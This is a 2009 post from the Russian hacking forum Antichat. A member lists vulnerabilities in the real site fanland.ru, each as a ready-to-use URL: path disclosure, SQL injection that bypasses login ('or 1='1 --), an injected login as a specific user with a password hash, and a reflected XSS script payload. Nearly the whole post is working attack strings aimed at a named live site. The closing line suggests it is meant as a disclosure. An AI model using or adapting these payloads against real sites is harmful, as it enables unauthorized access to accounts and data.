18.01.2009, 18:25
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Раскрытие путей
http://fanland.ru/news.php?usr='&pwd='%20--%20
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=3&tema=-1'&id=look_t
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=-1'&user=BlackKogep&tema=46&id=create_p
http://fanland.ru/?usr=valid user&pwd=valid pass (bzz, wtf 0_o)
В поиске тоже самое
SQL-INJ
http://fanland.ru/news.php?usr='+or+1%3d'1&pwd='%20--%20
XSS
http://fanland.ru/news.php?usr='+or+1%3d'1'%20--%20'>"><script>alert()</script><noscript>&pwd='%20--%20
sql-inj в действии
http://fanland.ru/msg.php?usr=West'%20--%20&pwd=b46641af0203c864a8f5c44f2ab9c250&id=read
------------------------
Дальше копать не буду, там этого добра еще навалом. На доработку, потом заходите снова
Последний раз редактировалось BlackSun; 18.01.2009 в 18:50..
|
|
|